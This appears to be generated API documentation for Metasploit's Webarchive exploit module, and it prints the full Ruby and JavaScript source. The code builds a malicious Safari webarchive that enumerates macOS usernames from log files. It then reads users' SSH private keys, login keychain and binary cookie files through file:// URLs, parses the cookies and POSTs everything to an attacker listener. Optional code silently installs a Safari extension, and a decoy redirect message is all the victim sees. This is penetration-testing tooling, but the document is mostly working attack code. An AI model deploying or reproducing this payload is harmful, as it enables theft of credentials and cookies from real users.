Module: Msf::Exploit::Format::Webarchive

Defined in:

lib/msf/core/exploit/format/webarchive.rb

Instance Method Summary

• #apple_extension_url ⇒ Object
• #backend_url ⇒ String

  Formatted http/https URL of the listener.

• #collect_data_uri ⇒ String

  The path to send data back to.

• #default_files ⇒ Object
• #escape_xml(input) ⇒ String

  Input with dangerous chars replaced with xml entities.

• #iframes_container_html ⇒ String

  Mark up for embedding the iframes for each URL in a place that is invisible to the user.

• #initialize(info = {}) ⇒ Object
• #injected_js_helpers ⇒ String

  Javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener.

• #install_extension ⇒ Object
• #message ⇒ String

  HTML content that is rendered in the <body> of the webarchive.

• #should_steal_files? ⇒ Boolean
• #steal_default_files ⇒ Object
• #steal_files ⇒ String

  Javascript code, wrapped in a script tag, that steals local files and sends them back to the listener.

• #urls ⇒ Array<String>

  Of URLs provided by the user.

• #webarchive_download_url ⇒ String

  URL that serves the malicious webarchive.

• #webarchive_footer ⇒ String

  The closing chunk of the webarchive XML code.

• #webarchive_header ⇒ String

  The first chunk of the webarchive file, containing the WebMainResource.

• #webarchive_xml ⇒ String

  Contents of webarchive as an XML document.

• #wrap_with_doc(&blk) ⇒ Object

  Wraps the result of the block in an HTML5 document and body.

• #wrap_with_script(&blk) ⇒ Object

  Wraps the result of the block with <script> tags.

Instance Method Details

#apple_extension_url ⇒ Object

# File 'lib/msf/core/exploit/format/webarchive.rb', line 100

def apple_extension_url
  'https://extensions.apple.com'
end

#backend_url ⇒ String

Returns formatted http/https URL of the listener.

Returns:

• (String) —

  formatted http/https URL of the listener

# File 'lib/msf/core/exploit/format/webarchive.rb', line 330

def backend_url
  proto = (datastore["SSL"] ? "https" : "http")
  myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
  port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
  "#{proto}://#{myhost}#{port_str}"
end

#collect_data_uri ⇒ String

Returns the path to send data back to.

Returns:

• (String) —

  the path to send data back to

# File 'lib/msf/core/exploit/format/webarchive.rb', line 325

def collect_data_uri
  '/' + (datastore["URIPATH"] || '').chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
end

#default_files ⇒ Object

# File 'lib/msf/core/exploit/format/webarchive.rb', line 156

def default_files
  ('file:///Users/$USER/.ssh/id_rsa file:///Users/$USER/.ssh/id_rsa.pub '+
    'file:///Users/$USER/Library/Keychains/login.keychain ' +
    (datastore['FILE_URLS'].split(/\s+/)).select { |s| s.include?('$USER') }.join(' ')).strip
end

#escape_xml(input) ⇒ String

Returns input with dangerous chars replaced with xml entities.

Parameters:

• input (String) —

  the unencoded string

Returns:

• (String) —

  input with dangerous chars replaced with xml entities

# File 'lib/msf/core/exploit/format/webarchive.rb', line 354

def escape_xml(input)
  input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
            .gsub(">", "&gt;").gsub("'", "&apos;")
            .gsub("\"", "&quot;")
end

#iframes_container_html ⇒ String

Returns mark up for embedding the iframes for each URL in a place that is invisible to the user.

Returns:

• (String) —

  mark up for embedding the iframes for each URL in a place that is invisible to the user

# File 'lib/msf/core/exploit/format/webarchive.rb', line 94

def iframes_container_html
  wrap_with_doc do
    injected_js_helpers + steal_files + install_extension + message
  end
end

#initialize(info = {}) ⇒ Object

# File 'lib/msf/core/exploit/format/webarchive.rb', line 11

def initialize(info={})
  super
  register_options([
    OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
    OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
    OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
    OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
    OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
    OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
    OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
    OptBool.new('INSTALL_EXTENSION', [true, "Silently install a Safari extensions (requires click)", false]),
    OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install", "https://data.getadblock.com/safari/AdBlock.safariextz"]),
    OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install", "com.betafish.adblockforsafari-UAMUU4S2D9"])
  ], self.class)
end

#injected_js_helpers ⇒ String

Returns javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener.

Returns:

• (String) —

  javascript code, wrapped in script tag, that adds a helper function called “sendData()” that passes the arguments up to the parent frame, where it is sent out to the listener

# File 'lib/msf/core/exploit/format/webarchive.rb', line 306

def injected_js_helpers
  wrap_with_script do
    %Q|
      window.sendData = function(key, val) {
        var data = {};
        data[key] = val;

        var x = new XMLHttpRequest;
        x.open('POST', '#{backend_url}#{collect_data_uri}', true);
        x.setRequestHeader('Content-type', 'text/plain')
        x.send(JSON.stringify(data));
      };
    |
  end
end

#install_extension ⇒ Object

# File 'lib/msf/core/exploit/format/webarchive.rb', line 104

def install_extension
  return '' unless datastore['INSTALL_EXTENSION']
  raise "EXTENSION_URL datastore option missing" unless datastore['EXTENSION_URL'].present?
  raise "EXTENSION_ID datastore option missing" unless datastore['EXTENSION_ID'].present?
  wrap_with_script do
    %Q|
    var qq = null;
    var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
    var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');

    function go(){
      window.focus();
      qq.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', '_self');
    }
    window.addEventListener('message', function(e) {
      if (!qq && e.data === 'EXT') {
        qq = e.source;
        setInterval(go, 600);
      }
    });
    |
  end
end

#message ⇒ String

Returns HTML content that is rendered in the <body> of the webarchive.

Returns:

• (String) —

  HTML content that is rendered in the <body> of the webarchive.

# File 'lib/msf/core/exploit/format/webarchive.rb', line 343

def message
  "<p>You are being redirected.</p>"
end

#should_steal_files? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/exploit/format/webarchive.rb', line 360

def should_steal_files?
  datastore['STEAL_FILES']
end

#steal_default_files ⇒ Object

# File 'lib/msf/core/exploit/format/webarchive.rb', line 162

def steal_default_files
  %Q|

    try {

function xhr(url, cb, responseType) {
var x = new XMLHttpRequest;
x.onload = function() { cb(x) }
x.open('GET', url);
if (responseType) x.responseType = responseType;
x.send();
}

var files = ['/var/log/monthly.out', '/var/log/appstore.log', '/var/log/install.log'];
var done = 0;
var _u = {};

var cookies = [];
files.forEach(function(f) {
xhr(f, function(x) {
  var m;
  var users = [];
  var pattern = /\\/Users\\/([^\\s^\\/^"]+)/g;
  while ((m = pattern.exec(x.responseText)) !== null) {
    if(!_u[m[1]]) { users.push(m[1]); }
    _u[m[1]] = 1;
  }

  if (users.length) { next(users); }
});
});

var id=0;
function next(users) {
// now lets steal all the data we can!
sendData('usernames'+id, users);
id++;
users.forEach(function(user) {

  if (#{datastore['STEAL_COOKIES']}) {
    xhr('file:///Users/'+encodeURIComponent(user)+'/Library/Cookies/Cookies.binarycookies', function(x) {
      parseBinaryFile(x.response);
    }, 'arraybuffer');
  }

  if (#{datastore['STEAL_FILES']}) {
    var files = '#{Rex::Text.encode_base64(default_files)}';
    atob(files).split(/\\s+/).forEach(function(file) {
      file = file.replace('$USER', encodeURIComponent(user));
      xhr(file, function(x) {
        sendData(file.replace('file://', ''), x.responseText);
      });
    });
  }

});
}

function parseBinaryFile(buffer) {
var data = new DataView(buffer);

// check for MAGIC 'cook' in big endian
if (data.getUint32(0, false) != 1668247403)
  throw new Error('Invalid magic at top of cookie file.')

// big endian length in next 4 bytes
var numPages = data.getUint32(4, false);
var pageSizes = [], cursor = 8;
for (var i = 0; i < numPages; i++) {
  pageSizes.push(data.getUint32(cursor, false));
  cursor += 4;
}

pageSizes.forEach(function(size) {
  parsePage(buffer.slice(cursor, cursor + size));
  cursor += size;
});

reportStolenCookies();
}

function parsePage(buffer) {
var data = new DataView(buffer);
if (data.getUint32(0, false) != 256) {
  return; // invalid magic in page header
}

var numCookies = data.getUint32(4, true);
var offsets = [];
for (var i = 0; i < numCookies; i++) {
  offsets.push(data.getUint32(8+i*4, true));
}

offsets.forEach(function(offset, idx) {
  var next = offsets[idx+1] \|\| buffer.byteLength - 4;
  try{parseCookie(buffer.slice(offset, next));}catch(e){};
});
}

function read(data, offset) {
var str = '', c = null;
try {
  while ((c = data.getUint8(offset++)) != 0) {
    str += String.fromCharCode(c);
  }
} catch(e) {};
return str;
}

function parseCookie(buffer) {
var data = new DataView(buffer);
var size = data.getUint32(0, true);
var flags = data.getUint32(8, true);
var urlOffset = data.getUint32(16, true);
var nameOffset = data.getUint32(20, true);
var pathOffset = data.getUint32(24, true);
var valueOffset = data.getUint32(28, true);

var result = {
  value: read(data, valueOffset),
  path: read(data, pathOffset),
  url: read(data, urlOffset),
  name: read(data, nameOffset),
  isSecure: flags & 1,
  httpOnly: flags & 4
};

cookies.push(result);
}

function reportStolenCookies() {
if (cookies.length > 0) {
  sendData('cookieDump', cookies);
}
}

} catch (e) { console.log('ERROR: '+e.message); }

  |
end

#steal_files ⇒ String

Returns javascript code, wrapped in a script tag, that steals local files and sends them back to the listener. This code is executed in the WebMainResource (parent) frame, which runs in the file:// protocol.

Returns:

• (String) —

  javascript code, wrapped in a script tag, that steals local files and sends them back to the listener. This code is executed in the WebMainResource (parent) frame, which runs in the file:// protocol

# File 'lib/msf/core/exploit/format/webarchive.rb', line 131

def steal_files
  return '' unless should_steal_files?
  urls_str = (datastore['FILE_URLS'].split(/\s+/)).reject { |s| !s.include?('$USER') }.join(' ')
  wrap_with_script do
    %Q|
      var filesStr = "#{urls_str}";
      var files = filesStr.trim().split(/\s+/);
      function stealFile(url) {
        var req = new XMLHttpRequest();
        var sent = false;
        req.open('GET', url, true);
        req.onreadystatechange = function() {
          if (!sent && req.responseText && req.responseText.length > 0) {
            sendData(url, req.responseText);
            sent = true;
          }
        };
        req.send(null);
      };
      files.forEach(stealFile);

    | + steal_default_files
  end
end

#urls ⇒ Array<String>

Returns of URLs provided by the user.

Returns:

• (Array<String>) —

  of URLs provided by the user

# File 'lib/msf/core/exploit/format/webarchive.rb', line 348

def urls
  (datastore['URLS'] || '').split(/\s+/)
end

#webarchive_download_url ⇒ String

Returns URL that serves the malicious webarchive.

Returns:

• (String) —

  URL that serves the malicious webarchive

# File 'lib/msf/core/exploit/format/webarchive.rb', line 338

def webarchive_download_url
  datastore["DOWNLOAD_PATH"]
end

#webarchive_footer ⇒ String

Returns the closing chunk of the webarchive XML code.

Returns:

• (String) —

  the closing chunk of the webarchive XML code

# File 'lib/msf/core/exploit/format/webarchive.rb', line 65

def webarchive_footer
  %Q|
      </array>
    </dict>
    </plist>
  |
end

#webarchive_header ⇒ String

Returns the first chunk of the webarchive file, containing the WebMainResource.

Returns:

• (String) —

  the first chunk of the webarchive file, containing the WebMainResource

# File 'lib/msf/core/exploit/format/webarchive.rb', line 38

def webarchive_header
  %Q|
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
      "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
      <key>WebMainResource</key>
      <dict>
        <key>WebResourceData</key>
        <data>
          #{Rex::Text.encode_base64(iframes_container_html)}</data>
        <key>WebResourceFrameName</key>
        <string></string>
        <key>WebResourceMIMEType</key>
        <string>text/html</string>
        <key>WebResourceTextEncodingName</key>
        <string>UTF-8</string>
        <key>WebResourceURL</key>
        <string>file:///</string>
      </dict>
      <key>WebSubframeArchives</key>
      <array>
  |
end

#webarchive_xml ⇒ String

Returns contents of webarchive as an XML document.

Returns:

• (String) —

  contents of webarchive as an XML document

# File 'lib/msf/core/exploit/format/webarchive.rb', line 30

def webarchive_xml
  return @xml if not @xml.nil? # only compute xml once
  @xml = webarchive_header
  @xml << webarchive_footer
  @xml
end

#wrap_with_doc(&blk) ⇒ Object

Wraps the result of the block in an HTML5 document and body

# File 'lib/msf/core/exploit/format/webarchive.rb', line 76

def wrap_with_doc(&blk)
  %Q|
    <!doctype html>
    <html>
      <body>
        #{yield}
      </body>
    </html>
  |
end

#wrap_with_script(&blk) ⇒ Object

Wraps the result of the block with <script> tags

# File 'lib/msf/core/exploit/format/webarchive.rb', line 88

def wrap_with_script(&blk)
  "<script>#{yield}</script>"
end